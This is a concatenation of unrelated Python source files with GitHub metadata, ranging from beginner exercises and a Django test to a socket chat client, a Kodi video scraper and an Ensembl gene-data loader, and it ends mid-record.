self.custom_print(" total images: {}".format(len(self.system_dict["local"]["data_loaders"]["test"])));
self.custom_print(" num correct predictions: {}".format(running_corrects));
self.custom_print(" Average accuracy (%): {}".format(accuracy*100));
self.system_dict["testing"]["num_images"] = len(self.system_dict["local"]["data_loaders"]["test"]);
self.system_dict["testing"]["num_correct_predictions"] = running_corrects;
self.system_dict["testing"]["percentage_accuracy"] = accuracy*100;
self.system_dict["testing"]["class_accuracy"] = class_dict
self.system_dict["testing"]["status"] = True;
self.custom_print("");
return accuracy*100, class_dict;
###############################################################################################################################################
###############################################################################################################################################
@accepts("self", img_name=[str, bool], img_dir=[str, bool], return_raw=bool, post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def set_prediction_final(self, img_name=False, img_dir=False, return_raw=False):
self.custom_print("Prediction");
if(not self.system_dict["dataset"]["params"]["input_size"]):
msg = "Input Size not set for experiment.\n";
msg += "Tip: Use update_input_size";
raise ConstraintError(msg);
self.system_dict = set_transform_test(self.system_dict);
if(not self.system_dict["dataset"]["params"]["classes"]):
msg = "Class information unavailabe.\n";
msg += "Labels returned - Indexes instead of classes";
ConstraintWarning(msg);
if(img_name):
self.custom_print(" Image name: {}".format(img_name));
label, score, raw_output = process_single(img_name, return_raw, self.system_dict);
self.custom_print(" Predicted class: {}".format(label));
self.custom_print(" Predicted score: {}".format(score));
tmp = {};
tmp["img_name"] = img_name;
tmp["predicted_class"] = label;
tmp["score"] = score;
if(return_raw):
tmp["raw"] = raw_output;
self.custom_print("");
return tmp;
if(img_dir):
output = [];
self.custom_print(" Dir path: {}".format(img_dir));
img_list = os.listdir(img_dir);
self.custom_print(" Total Images: {}".format(len(img_list)));
self.custom_print("Processing Images");
if(self.system_dict["verbose"]):
pbar = tqdm(total=len(img_list));
for i in range(len(img_list)):
if(self.system_dict["verbose"]):
pbar.update();
img_name = img_dir + "/" + img_list[i];
label, score, raw_output = process_single(img_name, return_raw, self.system_dict);
tmp = {};
tmp["img_name"] = img_list[i];
tmp["predicted_class"] = label;
tmp["score"] = score;
if(return_raw):
tmp["raw"] = raw_output;
output.append(tmp);
self.custom_print("");
return output
###############################################################################################################################################
|
[
"abhishek4273@gmail.com"
] |
abhishek4273@gmail.com
|
92d45f0567a686cb57d652d6ccaf23ffcd01a779
|
8d169bd14e4b4afaf27de87b62c2608e967b86c9
|
/service.py
|
dd3d70fa82e873c7fa5c497e9d3870dab1681c3f
|
[
"Unlicense"
] |
permissive
|
floort/buienbadge
|
72fcc7a9a488240a6189aa6bc7a9438bdb54f3e7
|
178a090970e69891b3381a8d158b06d1b611c147
|
refs/heads/master
| 2021-06-20T08:34:34.982594
| 2017-08-05T20:23:56
| 2017-08-05T20:23:56
| 99,443,591
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,263
|
py
|
import urequests
import ugfx
import network
import badge
import time
def setup():
pass
def loop():
sta_if = network.WLAN(network.STA_IF); sta_if.active(True) # Activate standalone interface
sta_if.scan() # Scan for available access points
sta_if.connect("SHA2017-insecure") # Connect to the public SHA2017 AP without a password
sta_if.isconnected() # Check for successful connection
sta_if.ifconfig() # Print connection information
r = urequests.get('https://br-gpsgadget-new.azurewebsites.net/data/raintext/?lat=52.28&lon=5.52')
lines = r.text.splitlines()
raindata = [int(lines[i].split('|')[0]) for i in range(len(lines))]
if sum(raindata) > 0:
# Plot graph
ugfx.clear(ugfx.WHITE)
for i in range(len(raindata)):
ugfx.area(12*i,127-(raindata[i]//2), 11, 127, ugfx.BLACK)
ugfx.flush()
badge.leds_init()
badge.leds_send_data(bytes([0, 0, raindata[0]//2, 0]*6) ,24) # all blue with intensity of current rain
badge.vibrator_init()
badge.vibrator_activate(9)
time.sleep(2)
badge.leds_disable()
return 15*60*1000
|
[
"noreply@github.com"
] |
floort.noreply@github.com
|
9992ff9aee45ed02003d5ce75e3b546b9fbcc500
|
80e6d8be1918fdd3f1f73d356daa5d4252913861
|
/6.If Statement & Assignment.py
|
599eaebb53c17e2b08211eac8f24265184dc188b
|
[] |
no_license
|
koolhussain/Python-Basics
|
0bf539d2caaf16259e9734b5969fb8762389c905
|
26c3707197f829927a143601a9e3e6da89178291
|
refs/heads/master
| 2021-09-09T11:20:03.156611
| 2018-03-15T14:41:37
| 2018-03-15T14:41:37
| 115,584,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 612
|
py
|
x = 5
y = 8
z = 5
a = 3
#if example
if x < y:
print('X is lesser than y')
if z < y > x:
print('Y is greatre than Z & X')
if z < y > x > a:
print('Y is greatre than Z & X')
if z <= x:
print('z is less than to equal to x')
#if else example
if x > y:
print('X is greater than y')
else:
print('Y is Greater than X')
#elif examples
x = 5
y = 10
z = 22
#if conditions is true other conditions below them
#are not checked even if they are true
if x > y:
print('x > y')
elif x < z:
print('x < z')
elif 5 > 2:
print('5 > 2')
else:
print('if and elif never ran')
|
[
"ahmad.hussain91@gmail.com"
] |
ahmad.hussain91@gmail.com
|
10e0407756b06e0e3a967eecaf43c67bfe4aa87b
|
f4e8d97d93e05430b4927427363ef47e692dade2
|
/ex30.py
|
11fb5c2b1dc63c2108e4d35cc5f94a6d01979840
|
[] |
no_license
|
MsJayMorris/learnpythonthehardway
|
6fa91f917e6c87fb8617161e9f4d61750579a2ca
|
f56a62bd3a51b12ff065c26b3b2adefa33593a44
|
refs/heads/master
| 2021-01-10T16:30:08.162781
| 2016-01-30T10:49:15
| 2016-01-30T10:49:15
| 48,209,590
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 512
|
py
|
people = 30
cars = 40
trucks = 15
if cars > people Or trucks > cars:
print "We should take the cars."
elif cars < people:
print "We should not take the cars."
else:
print "We can't decide."
if trucks > cars And people < trucks:
print "That's too many trucks."
elif trucks < cars:
print "Maybe we could take the trucks."
else:
print "We stil can't decide."
if people > trucks:
print "Alright, let's just take the trucks."
else:
print "Fine, let's stay home then."
|
[
"msjaymorris@gmail.com"
] |
msjaymorris@gmail.com
|
a7c6f21ec1846551beda5168398d4af1642175d1
|
a1b69bbf742a4a4e7b6f166b20e7b5ab3c060b57
|
/playground/binary_file.py
|
677b04267c9c7cf48af553063d561722b2124331
|
[
"MIT"
] |
permissive
|
dpm76/uPyFlasher
|
8970af362652ef23124a62ea385e4ff22946849c
|
bd37d891af985c11e22f210789c33394460a0e4d
|
refs/heads/master
| 2021-06-01T22:33:52.803930
| 2020-07-27T14:42:02
| 2020-07-27T14:42:02
| 140,459,032
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
def printBinaryFile(path):
'''
Shows a binary file.
This function is intended to show a binary file uploaded to the MCU
@param path: path to the file
'''
with open(path, "rb") as f:
buffer = bytes(f.read(16))
while len(buffer) > 0:
line = ""
for byte in buffer:
line += "{0:02x} ".format(byte)
print(line)
buffer = bytes(f.read(16))
f.close()
|
[
"info@davidpm.eu"
] |
info@davidpm.eu
|
35f4e105582a5c17c9b15220071ef8798cb57d94
|
3ea720fde9aca2d71c34148bf9cec2082d4b32f6
|
/people/tests/unit/models/test_performer.py
|
619297920f732e651982c085cfd962d2030c5a4f
|
[] |
no_license
|
aqsmallwood/symphony-hall-backend
|
54d9905c6ea65ab5fc35e18beddaeef8e1337d82
|
fabdd9ca9e58a3bb4cdd2f41dc4d398c9e30ffe8
|
refs/heads/master
| 2022-06-17T06:01:13.509769
| 2020-02-28T05:37:08
| 2020-02-28T05:37:08
| 242,221,355
| 0
| 0
| null | 2022-05-25T04:18:21
| 2020-02-21T20:06:07
|
Python
|
UTF-8
|
Python
| false
| false
| 407
|
py
|
from people.models import Performer
def test_performer_has_necessary_fields():
performer = Performer()
assert True == hasattr(performer, 'id')
assert True == hasattr(performer, 'name')
def test_performer_has_meaningful_string_representation():
test_performer_name = 'Fiddling Fiddler'
performer = Performer(name=test_performer_name)
assert test_performer_name == str(performer)
|
[
"smallwoodadrian54@gmail.com"
] |
smallwoodadrian54@gmail.com
|
a26d9ab41dd1583a3474ec17749f3c2df866c269
|
3793d07a972c24f6bca9456b144b7415608d1e30
|
/movieDatabase-master/movies/migrations/0010_movie_has_tag_t_id.py
|
58aa82d13e4cc4f70102e09f8f2a685631eb855f
|
[] |
no_license
|
lucianHymer/movieDatabase
|
31591a0d939d158ef7c63937ffcfbbb3e7128077
|
7f5ad2541a21c0d1b7b7aec7fde13f9c1048b7ea
|
refs/heads/master
| 2021-01-19T09:15:45.556242
| 2017-08-24T21:48:44
| 2017-08-24T21:48:44
| 87,745,263
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
# Generated by Django 2.0.dev20170322162159 on 2017-04-06 18:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movies', '0009_movie_has_tag'),
]
operations = [
migrations.AddField(
model_name='movie_has_tag',
name='t_id',
field=models.ManyToManyField(to='movies.Tag'),
),
]
|
[
"mdng223@g.uky.edu"
] |
mdng223@g.uky.edu
|
49473eb66d8de28c289682d058fe5aabf9e6059a
|
256faeac3766bdcb563d85af95902ed8bce40cf0
|
/sets-discard,pop,delete-operations.py
|
a71b3ddc8caf8f6ae02576e58e186eb97b250aec
|
[] |
no_license
|
Harini-sakthivel/PYTHON-Hands-on-coding-
|
2285863edbebcccd4770616549c111b7bafaa913
|
c54e64ea9e51ea6629c3311a613a3d23bacb4ccc
|
refs/heads/master
| 2021-07-12T04:06:17.716157
| 2019-08-18T09:30:19
| 2019-08-18T09:30:19
| 202,975,946
| 4
| 1
| null | 2020-10-03T14:21:14
| 2019-08-18T07:59:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,087
|
py
|
'''
.remove(x)
>>> s = set([1, 2, 3, 4, 5, 6, 7, 8, 9])
>>> s.remove(5)
>>> print s
set([1, 2, 3, 4, 6, 7, 8, 9])
>>> print s.remove(4)
None
>>> print s
set([1, 2, 3, 6, 7, 8, 9])
>>> s.remove(0)
KeyError: 0
.discard(x)
>>> s = set([1, 2, 3, 4, 5, 6, 7, 8, 9])
>>> s.discard(5)
>>> print s
set([1, 2, 3, 4, 6, 7, 8, 9])
>>> print s.discard(4)
None
>>> print s
set([1, 2, 3, 6, 7, 8, 9])
>>> s.discard(0)
>>> print s
set([1, 2, 3, 6, 7, 8, 9])
.pop()
>>> s = set([1])
>>> print s.pop()
1
>>> print s
set([])
>>> print s.pop()
KeyError: pop from an empty set
input:
9
1 2 3 4 5 6 7 8 9
10
pop
remove 9
discard 9
discard 8
remove 7
pop
discard 6
remove 5
pop
discard 5
op
{2, 3, 4, 5, 6, 7, 8, 9}
{2, 3, 4, 5, 6, 7, 8}
{2, 3, 4, 5, 6, 7, 8}
{2, 3, 4, 5, 6, 7}
{2, 3, 4, 5, 6}
{3, 4, 5, 6}
{3, 4, 5}
{3, 4}
{4}
4
'''
n = int(input())
s = set(map(int, input().split()))
methods = {
'pop' : s.pop,
'remove' : s.remove,
'discard' : s.discard
}
for _ in range(int(input())):
method, *args = input().split()
methods[method](*map(int,args))
print(sum(s))
print(s)
|
[
"noreply@github.com"
] |
Harini-sakthivel.noreply@github.com
|
83f4c71b012c11784749714418397eef3ae1f6ca
|
be4d3de3a08164b2ae7c92442be10a560a7dc119
|
/client.py
|
f99f99c357ef828926571c35ef42a4c0e45f88e4
|
[] |
no_license
|
magnuscodex/chat
|
b8db014db2cee598b487736dfb75bdcfbfee6170
|
29edd4b878959c4c37f3d5347f087bc0b4161ca2
|
refs/heads/master
| 2021-01-10T19:50:42.564533
| 2014-01-17T07:15:18
| 2014-01-17T07:15:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
#!/usr/bin/env python
import socket
import sys
import signal
from select import select
TCP_PORT = 4675
BUFF_SIZE = 1024
TIMEOUT = 1
def sig_handler(sig, frame):
print "Exiting"
#TODO make socket global and close it
exit(0)
signal.signal(signal.SIGINT, sig_handler)
host = raw_input("server name:")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, TCP_PORT))
while True:
#First send input, if any
rlist, _, _ = select([sys.stdin], [], [], TIMEOUT)
if rlist:
msg = sys.stdin.readline()
s.send(msg)
#Second, print all messages received
received = True
while received:
rlist, _, _ = select([s], [], [], TIMEOUT)
if rlist:
data = s.recv(BUFF_SIZE)
if not data:
s.close()
exit(0)
print data,
else:
received = False
s.close()
|
[
"magnuscodex@gmail.com"
] |
magnuscodex@gmail.com
|
bc5075b856cd517a73420eef0f7cffb2dc993082
|
55dc9c7d7fb03aba894c15e2b7ed06e89b522da9
|
/predict.py
|
c7d4d5df5e25fd61422252d1242a73e9fece4bf8
|
[] |
no_license
|
HotVector/Face-Authentication
|
6e7636077d9a104d624ad776428f6b9a19cd9f4a
|
5e67f88d2b85051318551d7d3102f3589611bd38
|
refs/heads/master
| 2021-01-24T03:30:29.850038
| 2018-04-22T14:27:41
| 2018-04-22T14:27:41
| 122,895,403
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
import tensorflow as tf
import cv2
class FacePredict(object):
def faceCompare(self, faces):
#print("Begin Compare.")
gray = cv2.cvtColor(faces[0], cv2.COLOR_BGR2GRAY)
###for idx, i in enumerate(faces):
### windowName = "Face - " + str(idx)
### cv2.imshow(windowName, i)
#TODO Use this photo and predicts
|
[
"veerendra2002@gmail.com"
] |
veerendra2002@gmail.com
|
89249622c56fe5943c302eea7bb7045414687ae1
|
aa79f29196a90788a6d47fdaae39ac6c5ce2a710
|
/backend/profiles/admin.py
|
5aa08fe30ddf921ed9f96b1b7ccd22d783e7c6a1
|
[] |
no_license
|
MutwiriFrank/twitter_clone
|
5c4bb902dfbeef9793da9bb0b9bd0713e6f712cb
|
718dbb4f4ae3da968f67f8efe2bb53411e8dc1f5
|
refs/heads/master
| 2023-06-22T10:12:44.780344
| 2021-07-24T09:20:32
| 2021-07-24T09:20:32
| 389,051,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
from django.contrib import admin
from .models import Profile, FollowerRelation, Skills, Review
admin.site.register(Profile)
admin.site.register(Skills)
admin.site.register(FollowerRelation)
admin.site.register(Review)
|
[
"mutwirifranco@gmail.com"
] |
mutwirifranco@gmail.com
|
b3d3ff47eb93e30ac5afeb9d6c86f0b632d925a7
|
4e9aa9c6e3d6a12a5cd0a2332a1a8ef8124045bf
|
/plugin.video.salts/scrapers/2movies_scraper.py
|
e3b7496fd09580e9950f6ab0b254e0f59983471d
|
[] |
no_license
|
Oggie101/tknorris-beta-repo
|
53354005c089b80e09067f412c4c701561826988
|
5e7aa01fea46b31c0df7b69012fb1473221e2469
|
refs/heads/master
| 2021-01-18T00:31:24.679958
| 2015-10-14T19:16:23
| 2015-10-14T19:16:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,722
|
py
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import urlparse
import re
import time
from salts_lib import kodi
from salts_lib import log_utils
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
from salts_lib.constants import XHR
BASE_URL = 'http://twomovies.us'
AJAX_URL = '/Xajax/ajaxifyy/'
class TwoMovies_Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return '2movies'
def resolve_link(self, link):
url = urlparse.urljoin(self.base_url, link)
html = self._http_get(url, cookies={'links_tos': '1'}, cache_limit=0)
match = re.search('<iframe[^<]+src=(?:"|\')([^"\']+)', html, re.DOTALL | re.I)
if match:
return match.group(1)
else:
match = re.search('href="[^"]*/go_away/\?go=([^"]+)', html)
if match:
return match.group(1)
def format_source_label(self, item):
return '[%s] %s' % (item['quality'], item['host'])
def get_sources(self, video):
sources = []
source_url = self.get_url(video)
if source_url:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=1)
pattern = 'class="playDiv3".*?href="([^"]+).*?>(.*?)</a>'
for match in re.finditer(pattern, html, re.DOTALL | re.I):
url, host = match.groups()
source = {'multi-part': False, 'url': url.replace(self.base_url, ''), 'host': host, 'class': self, 'quality': self._get_quality(video, host, QUALITIES.HIGH), 'rating': None, 'views': None, 'direct': False}
sources.append(source)
return sources
def get_url(self, video):
return super(TwoMovies_Scraper, self)._default_get_url(video)
def search(self, video_type, title, year):
results = []
search_url = urlparse.urljoin(self.base_url, AJAX_URL)
xjxr = str(int(time.time() * 1000))
search_arg = 'S<![CDATA[%s]]>' % (title)
data = {'xjxfun': 'search_suggest', 'xjxr': xjxr, 'xjxargs[]': [search_arg, 'Stitle']}
html = self._http_get(search_url, data=data, headers=XHR, cache_limit=0)
if video_type == VIDEO_TYPES.MOVIE:
marker = '/watch_movie/'
else:
marker = '/watch_tv_show/'
for match in re.finditer('href="([^"]+)[^>]+>(.*?)</div>', html):
url, match_title_year = match.groups()
if marker not in url: continue
match_title_year = re.sub('(<b>|</b>)', '', match_title_year)
match = re.search('(.*?)\s+\(?(\d{4})\)?', match_title_year)
if match:
match_title, match_year = match.groups()
else:
match_title = match_title_year
match_year = ''
if not year or not match_year or year == match_year:
result = {'url': url.replace(self.base_url, ''), 'title': match_title, 'year': match_year}
results.append(result)
return results
def _get_episode_url(self, show_url, video):
episode_pattern = 'class="linkname\d*" href="([^"]+/watch_episode/[^/]+/%s/%s/)"' % (video.season, video.episode)
title_pattern = 'class="linkname"\s+href="([^"]+)">Episode_\d+\s+-\s+([^<]+)'
return super(TwoMovies_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def _http_get(self, url, cookies=None, data=None, headers=None, cache_limit=8):
return super(TwoMovies_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, cookies=cookies, data=data, headers=headers, cache_limit=cache_limit)
|
[
"tknorris@gmail.com"
] |
tknorris@gmail.com
|
77a6931ad430cd0530157aacb5dc04b0e9ae289b
|
04d821121ccf79fe3935ce542e039f31b5997e42
|
/microservice/drone_ifood/apps.py
|
f60235fa89ee96d818c74fdf3b9d4b4c8b60a3f0
|
[] |
no_license
|
jcpribeiro/Atividade_FIAP
|
d351f0e5c93d4e46db6957126d73040121ec7f2f
|
3bcaeaa63bd0c8b3bd4f1b5b8ad103515f37e449
|
refs/heads/main
| 2023-08-21T05:01:58.020745
| 2021-09-30T22:54:58
| 2021-09-30T22:54:58
| 411,798,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
from django.apps import AppConfig
class DroneIfoodConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'drone_ifood'
|
[
"42126757+jcpribeiro@users.noreply.github.com"
] |
42126757+jcpribeiro@users.noreply.github.com
|
b9b8310451c9429b1ccaa0e257eb72aa6c00031d
|
401069e7f0e8a865c6c18bc9ca0f2cbcc8cba6b2
|
/ensembl_gene/ensembl_gene.py
|
4a2adb872ed8cc81ecb2b426518bd565e29c75f7
|
[] |
no_license
|
wul0228/mydb_v1
|
e48981d18dac6f88acdc84cdc0b2c3c7a5d244c9
|
66a2cc681ef4670161e68a6cfc5447b126dba46c
|
refs/heads/master
| 2021-09-06T23:01:12.202023
| 2018-02-13T03:37:04
| 2018-02-13T03:37:04
| 115,709,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,173
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# date: 2017/11/28
# author:wuling
# emai:ling.wu@myhealthygene.com
#this model set to download,extract,standard insert and select gene data from ensembl
import sys
sys.path.append('../')
sys.setdefaultencoding = ('utf-8')
from share import *
from config import *
__all__ = ['downloadData','extractData','standarData','insertData','updateData','selectData']
version = 1.0
model_name = psplit(os.path.abspath(__file__))[1]
(ensembl_gene_model,ensembl_gene_raw,ensembl_gene_store,ensembl_gene_db,ensembl_gene_map) = buildSubDir('ensembl_gene')
log_path = pjoin(ensembl_gene_model,'ensembl_gene.log')
# main code
def downloadData(redownload = False):
'''
this function is to download the raw data from ensembl gene FTP WebSite
args:
redownload-- default False, check to see if exists an old edition before download
-- if set to true, download directly with no check
'''
if not redownload:
(choice,existensemblFile) = lookforExisted(ensembl_gene_raw,'gene')
if choice != 'y':
return
if redownload or not existensemblFile or choice == 'y':
rawdir = pjoin(ensembl_gene_raw,'gene_{}'.format(today))
createDir(rawdir)
process = parse(today)
#-----------------------------------------------------------------------------------------------------------------
# download gtfGRch38 file
ensembl_gene_ftp_infos['logdir'] = ensembl_gtfGRch38_ftp_path
process.getOne(ensembl_gene_ftp_infos,filename_gtfGRch38,rawdir)
# # download regulatorGRch38 files
# ensembl_gene_ftp_infos['logdir'] = ensembl_regulatorGRch38_ftp_path
# func = lambda x:downloadOne(ensembl_gene_ftp_infos,x,rawdir)
# multiProcess(func,filenames_regulatorGRch38,size=16)
#-----------------------------------------------------------------------------------------------------------------
# download gtfGRch37 file
ensembl_gene_ftp_infos['logdir'] = ensembl_gtfGRch37_ftp_path
downloadOne(ensembl_gene_ftp_infos,filename_gtfGRch37,rawdir)
# # download regulatorGRch37 files
# ensembl_gene_ftp_infos['logdir'] = ensembl_regulatorGRch37_ftp_path
# func = lambda x:downloadOne(ensembl_gene_ftp_infos,x,rawdir)
# multiProcess(func,filenames_regulatorGRch37,size=16)
#-----------------------------------------------------------------------------------------------------------------
# generate a log file in current path
if not os.path.exists(log_path):
initLogFile('ensembl_gene',model_name,ensembl_gene_model,rawdir=rawdir)
#-----------------------------------------------------------------------------------------------------------------
# create every version files included
update_file_heads =dict()
for filename in listdir(rawdir):
head = filename.split('_213')[0].strip()
if head.count('.chr.gtf'):
head = head.split('.chr.gtf')[0].rsplit('.',1)[0] + '.chr.gtf'
update_file_heads[head] = pjoin(rawdir,filename)
with open(pjoin(ensembl_gene_db,'gene_{}.files'.format(today)),'w') as wf:
json.dump(update_file_heads,wf,indent=2)
print 'datadowload completed !'
#-----------------------------------------------------------------------------------------------------------------
# generate filepaths to next step extractData
filepaths = [pjoin(rawdir,filename) for filename in rawdir]
return (filepaths,today)
def extractData(filepaths,date):
'''
this function is set to distribute all filepath to parser to process
args:
filepaths -- all filepaths to be parserd
date -- the date of data download
'''
# 1. distribute filepaths for parser
gene_transcript_paths = [path for path in filepaths if psplit(path)[1].strip().count('chr.gtf') ]
# 2. parser filepaths step by step
process = parser(date)
# --------------------------------ensembl.gene.transcript-------------------------------------------------------------------------
process.gene_transcript(gene_transcript_paths)
print 'extract and insert complete '
# -------------------------------------------------------------------------------------------------------------------------------------------
# 3. bkup all collections
colhead = 'ensembl.gene'
bkup_allCols('mydb_v1',colhead,ensembl_gene_db)
return (filepaths,date)
def updateData(insert=True):
'''
this function is set to update all file in log
'''
ensembl_gene_log = json.load(open(log_path))
updated_rawdir = pjoin(ensembl_gene_raw,'gene_{}'.format(today))
# -------------------------------------------------------------------------------------------------------------------------------------------
new = False
for file,ftpsite in ensembl_file_ftplogdir.items():
ftp_infos = copy.deepcopy(ensembl_gene_ftp_infos)
ftp_infos['logdir'] = ftpsite
ftp = connectFTP(**ftp_infos)
filenames = ftp.nlst()
for filename in filenames:
if filename.count(ensembl_file_mark.get(file)):
mt = ftp.sendcmd('MDTM {}'.format(filename))
if mt != ensembl_gene_log.get(file)[-1][0]:
new = True
createDir(updated_rawdir)
downloadOne(ftp_infos,filename,updated_rawdir)
ensembl_gene_log[file].append((mt,today,model_name))
print '{} \'s new edition is {} '.format(filename,mt)
else:
print '{} {} is the latest !'.format(filename,mt)
if new:
with open(log_path,'w') as wf:
json.dump(ensembl_gene_log,wf,indent=2)
(latest_filepaths,version) = createNewVersion(ensembl_gene_raw,ensembl_gene_db,updated_rawdir,'gene_',today)
if insert:
extractData(latest_filepaths.values(),version)
return 'update successfully'
else:
return 'new version is\'t detected'
def selectData(querykey = 'gene_id',value='ENSG00000243485'):
'''
this function is set to select data from mongodb
args:
querykey -- a specified field in database
queryvalue -- a specified value for a specified field in database
'''
conn = MongoClient('127.0.0.1', 27017 )
db = conn.get_database('mydb_v1')
colnamehead = 'ensembl'
dataFromDB(db,colnamehead,querykey,queryvalue=None)
class parser(object):
"""docstring for parser"""
def __init__(self,date):
self.date = date
conn = MongoClient('localhost',27017)
db = conn.get_database('mydb_v1')
self.db = db
def getOne(self,ensembl_gene_ftp_infos,filename,rawdir):
'''
this function is to download one file under a given remote dir
args:
ftp -- a ftp cursor for a specified
filename -- the name of file need download
rawdir -- the directory to save download file
'''
while True:
try:
ftp = connectFTP(**ensembl_gene_ftp_infos)
mt = ftp.sendcmd('MDTM {}'.format(filename))
savefilename = '{}_{}_{}.gz'.format(filename.rsplit('.',1)[0].strip(),mt,today).replace(' ','')
remoteabsfilepath = pjoin(ensembl_gene_ftp_infos['logdir'],'{}'.format(filename))
print filename,'start'
save_file_path = ftpDownload(ftp,filename,savefilename,rawdir,remoteabsfilepath)
print filename,'done'
return (save_file_path,mt)
except:
ftp = connectFTP(**ensembl_gene_ftp_infos)
def gene_transcript(self,filepaths):
colname = 'ensembl.gene.transcript'
# before insert ,truncate collection
delCol('mydb_v1',colname)
col = self.db.get_collection(colname)
col.ensure_index([('transcript_id',1),])
for filepath in filepaths:
filename = psplit(filepath)[1].strip()
fileversion = filename.rsplit('_',1)[0].strip().rsplit('_',1)[1].strip()
if not col.find_one({'dataVersion':fileversion}):
col.insert({'dataVersion':fileversion,'dataDate':self.date,'colCreated':today,'file':'Homo_sapiens.GRCh?.?.chr.gtf'})
#-----------------------------------------------------------------------------------------------------------------------
# gunzip file
if filename.endswith('.gz'):
command = 'gunzip {}'.format(filepath)
os.popen(command)
filepath = filepath.rsplit('.gz',1)[0].strip()
#-----------------------------------------------------------------------------------------------------------------------
grch = filename.split('_sapiens.')[1].split('_213')[0].strip().split('.',1)[0]
file = open(filepath)
n = 0
gene_info = dict()
assembly = 'ensembl_{}'.format(grch)
for line in file:
if line.startswith('#'):
continue
# the front of line ,delimited by tab and have no key, and the latter delimited by ; with the format key space value("")
front_keys = ['chr','data_source','entry','start','end','score','strand','fields']
front = line.split('gene_id')[0].strip().split('\t')
front_dic = dict([(key,val) for key,val in zip(front_keys,front)])
# transform the string to int in start and end
front_dic['start' ] = int(front_dic['start' ])
front_dic['end' ] = int(front_dic['end' ])
latter = [i.strip() for i in line.strip().split('gene_id')[1].strip().split(';') if i ]
latter_dic = dict([(i.split(' ')[0],i.split(' ')[1].replace('"','')) for i in latter[1:] ])
gene_id = latter[0].replace('"','')
entry = front_dic.get('entry')
if entry == 'gene':
latter_dic['gene_id'] = gene_id
latter_dic.update(front_dic)
for key in ['data_source','entry','score','fields']:
latter_dic.pop(key)
latter_dic['assembly'] = assembly
gene_info[gene_id] = latter_dic
elif entry == 'transcript':
latter_dic['transcript_start'] = front_dic.get('start')
latter_dic['transcript_end'] = front_dic.get('end')
for key in latter_dic.keys():
if key.startswith('gene'):
latter_dic.pop(key)
latter_dic.update(gene_info.get(gene_id))
col.insert(latter_dic)
elif entry in ['Selenocysteine','five_prime_utr','three_prime_utr']:
transcript_id = latter_dic.get('transcript_id')
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$set':
{'{}_start'.format(entry):front_dic.get('start'),
'{}_end'.format(entry):front_dic.get('end')}
})
elif entry == 'exon':
transcript_id = latter_dic.get('transcript_id')
for key in latter_dic.keys():
if not key.startswith('exon'):
latter_dic.pop(key)
latter_dic['exon_start'] = front_dic.get('start')
latter_dic['exon_end'] = front_dic.get('end')
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$push':{'exon':latter_dic} },
False,
True
)
elif entry == 'CDS':
cds_aset = dict()
transcript_id = latter_dic.get('transcript_id')
cds_aset['cds_start'] = front_dic.get('start')
cds_aset['cds_end'] = front_dic.get('end')
cds_aset['protein_id'] = latter_dic['protein_id']
cds_aset['protein_version'] = latter_dic['protein_version']
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$push':{'cds':cds_aset}},
False,
True)
elif entry == 'start_codon' or entry == 'stop_codon':
transcript_id = latter_dic.get('transcript_id')
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$set':
{'{}_start'.format(entry):front_dic.get('start'),
'{}_end'.format(entry):front_dic.get('end')}
},
False,
True)
else:
print '================================',entry
latter_dic = dict()
n += 1
print grch,'gtf line',n,entry,gene_id
class dbMap(object):
"""docstring for dbMap"""
def __init__(self, arg):
super(dbMap, self).__init__()
self.arg = arg
class dbFilter(object):
"""docstring for dbFilter"""
def __init__(self, arg):
super(dbFilter, self).__init__()
self.arg = arg
def main():
modelhelp = model_help.replace('&'*6,'ENSEMBL_GENE').replace('#'*6,'ensembl_gene')
funcs = (downloadData,extractData,updateData,selectData,ensembl_gene_store)
getOpts(modelhelp,funcs=funcs)
if __name__ == '__main__':
main()
|
[
"ling.wu@myhealthgene.com"
] |
ling.wu@myhealthgene.com
|
adb12d09d6069e3548e300f017cbfcf43b1d6608
|
8658f9b6385eeccc02a92fbba8ad37f4d5356fef
|
/cs260/project6/AbstractCollection.py
|
7ef97fe2d35aa6934a14a1e57e33fa25d7a546e4
|
[] |
no_license
|
